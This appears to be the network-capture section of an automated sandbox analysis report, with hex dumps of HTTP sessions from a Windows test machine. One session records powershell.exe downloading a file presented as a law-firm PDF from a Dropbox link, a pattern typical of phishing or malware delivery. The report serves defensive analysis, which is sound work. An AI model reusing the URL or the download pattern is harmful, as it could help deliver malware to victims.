                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26
                                                                                                                                                                                                                                                                                                                        Data Ascii: 6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5
                                                                                                                                                                                                                                                                                                                        Data Ascii: Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4
                                                                                                                                                                                                                                                                                                                        Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea
                                                                                                                                                                                                                                                                                                                        Data Ascii: hKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98
                                                                                                                                                                                                                                                                                                                        Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65
                                                                                                                                                                                                                                                                                                                        Data Ascii: 9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/message
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        15192.168.2.649786172.64.41.34437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 45 00 0c 00 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: edgeassetserviceazureedgenet)EA
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:33 GMT
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                        CF-RAY: 8eff054f9e4b41e6-EWR
                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC468INData Raw: 00 00 81 80 00 01 00 05 00 00 00 01 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 09 61 7a 75 72 65 65 64 67 65 03 6e 65 74 00 00 01 00 01 c0 0c 00 05 00 01 00 00 06 cd 00 17 10 65 64 67 65 61 73 73 65 74 73 65 72 76 69 63 65 03 61 66 64 c0 1d c0 3c 00 05 00 01 00 00 0d d5 00 22 10 61 7a 75 72 65 65 64 67 65 2d 74 2d 70 72 6f 64 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 c0 27 c0 5f 00 05 00 01 00 00 00 01 00 2c 04 73 68 65 64 08 64 75 61 6c 2d 6c 6f 77 0b 73 2d 70 61 72 74 2d 30 30 31 32 06 74 2d 30 30 30 39 08 74 2d 6d 73 65 64 67 65 c0 27 c0 8d 00 05 00 01 00 00 00 01 00 02 c0 9b c0 9b 00 01 00 01 00 00 00 3c 00 04 0d 6b f6 28 00 00 29 04 d0 00 00 00 00 00 f2 00 0c 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: edgeassetserviceazureedgenetedgeassetserviceafd<"azureedge-t-prodtrafficmanager'_,sheddual-lows-part-0012t-0009t-msedge'<k()


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        16192.168.2.649797162.125.69.154436976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC370OUTGET /cd/0/get/CgCh17DjAot4f81U6ef-GP-6FG4okX8Og2zouwNyixm_AL2LxxJza7GzwZwN01fuHYucSY8eB_yzYhlfC1H3ZArjYrqXbVPaFd7BkA--Kny9hSL_9DMJZA6pOdQ5xxuhOyzp5h0kKcr1Wl3kKDYeO493/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                                                        Host: uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        Etag: 1733686441286063d
                                                                                                                                                                                                                                                                                                                        Pragma: public
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Server-Response-Time: 137
                                                                                                                                                                                                                                                                                                                        X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:34 GMT
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                        Content-Length: 106848
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: 38a6baba84d5492597da9f78c3a94917
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:35 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                                                        Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:35 UTC16384INData Raw: 5f 8a 3c 27 e3 2b db 25 d4 a5 b8 82 29 fe 58 ee 5b 78 64 3c 81 93 c8 e0 8e 45 7b 7e 99 7d 1e a7 a5 da de c5 c2 4f 12 c8 06 73 8c 8c e2 95 3a aa 6d ae a8 ac 5e 02 a6 1a 31 9b 69 c6 5b 34 73 7e 3f f1 74 be 14 d1 a3 9a da 14 92 ea 79 3c b8 c3 9e 17 8c 92 47 53 53 e8 f1 ae bd e1 98 6e e2 d6 6e de 7b 88 79 b9 8a 40 bb 18 8e 40 40 36 8c 1f 6c d5 6f 1f 78 2c 78 b7 4d 8c 43 28 8a f6 d8 93 0b 37 dd 39 ea a7 f2 1c d7 8f e9 da 97 89 3e 1d ea ed 03 a3 c0 58 e5 ed e5 c9 8e 51 d3 23 1c 7e 22 b2 a9 52 50 9d e4 bd d3 bf 07 83 a5 8a c2 a5 46 49 55 4e f6 7d 7f af f8 73 d4 fe 1f 5b df 68 b7 7a cf 87 b5 29 0c b3 41 28 b9 8e 66 ff 00 96 c8 fc 6e e7 dd 79 f7 35 e4 da cd bc de 1e f1 5d f4 31 ca ea 6d ae f7 c6 1b a7 5d c9 fa 1e b5 ec 5e 15 f1 a6 8b e2 8b 94 90 20 b6 d5 96 33 19
                                                                                                                                                                                                                                                                                                                        Data Ascii: _<'+%)X[xd<E{~}Os:m^1i[4s~?ty<GSSnn{y@@@6lox,xMC(79>XQ#~"RPFIUN}s[hz)A(fny5]1m]^ 3
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:35 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                                                        Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:35 UTC16384INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                                                        Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:35 UTC16384INData Raw: c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e 3d 78 f3 0f 4f 4d 85 ac 94 49 8f 6b ac 41 1f 92 52 2f 94 d2 4d 10 5b 7e ac 88 ed 68 72 27 d2 a0 96 06 d5 d4 23 29 bc 16 05 0f 19 c1 08 09 86 09 30 84 03 2d a2 4b c0 96 08 26 1e 4b 3c 9d d0 24 12 ae b2 9f 2e 8a 2e 5e 90 68 de 4a 15 65 c9 c7 63 cb 41 06 e4 f9 f7 d5 71 83 33 f3 4b 19 8a 85 b0 01 e1 68 79 d8 0f 54 2a 68 da 20 82 d5 b8 e3 f1 f7 1e 1b b6 25 46 ca bd 77 1c bd b3 a1 6c 49 75 05 4c 36 a1 1c 01 35 4a 4c ca 6e df f4 cc 96 95 f2 c0 ad 4f 6f b1 c6 62 12 45 5c 58 75 ff 37 67 22 3b f6 ed 4e 40 d1 d6 88 96 60 21 82 1f 4d 77 05 8d c2 a5 9b 08 bd 96 b0 46 1a db 1e dc b0 ef 99 23 75 40 10 00 a2 a2 04 65 6a 2f 6c 77 11 bb a1 59 8e 48 a2 d5 6a a7 69 11 ad 7c 12 14 81 28 a6 cb
                                                                                                                                                                                                                                                                                                                        Data Ascii: =kDc)Vc=xOMIkAR/M[~hr'#)0-K&K<$..^hJecAq3KhyT*h %FwlIuL65JLnOobE\Xu7g";N@`!MwF#u@ej/lwYHji|(
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:35 UTC16384INData Raw: 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c d4 aa a9 5b 54 db dc fc 4a 9a 91 b1 a6 32 c6 d4 cc ba 95 2d de dd cd 6f 0e 60 ec e6 cd 8c e9 1f 9a d7 3c 7f d1 fa 77 d5 41 8c 2d a9 67 cc 16 98 df 74 fa bc d7 ca 77 14 32 b6 6d 14 63 f6 0f 1a 1b 6a eb 3b 0f df f3 1a da b3 a2 bd 81 8d 70 d8 ee 49 3f 88 34 da 63 59 8d 8b 5a 56 0f 1b 63 3c 84 f4 47 8c 2d 9c d9 b4 a4 ae b6 ed c8 a6 53 18 db d5 9b b1 41 86 45 b5 ab 9b f3 17 65 ff 09 f9 8d 28 ef 5d d4 d0 52 7b ed d9 5b 57 32 de 7d 2f d2 e7 2c ae 5d d4 e0 8a bf 70 05 63 9f e1 99 7d 5a 9a 97 2c 6f e9 72 b3 8d 18 cf 9d a2 7c f3 b2 86 e6 db 7f 58 f0 08 63 6b 2f c6 e3 be 67 62 2e 0c 23 2e 5a 18 77 f5 b7 73 ec 43 bf 66 a9 26 26 ec c1 4f d6 3e 27 f8 9d ef 6e 7d f2 87 43 47 5a e3 3e 35
                                                                                                                                                                                                                                                                                                                        Data Ascii: 'G+x)}&N-wcu#<[TJ2-o`<wA-gtw2mcj;pI?4cYZVc<G-SAEe(]R{[W2}/,]pc}Z,or|Xck/gb.#.ZwsCf&&O>'n}CGZ>5
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:35 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                        17192.168.2.64979120.198.118.190443
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:34 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 35 46 62 64 76 42 75 55 30 6d 31 34 43 4f 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 37 32 61 61 37 64 31 65 30 39 64 39 36 36 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: I5FbdvBuU0m14COf.1Context: 9572aa7d1e09d966
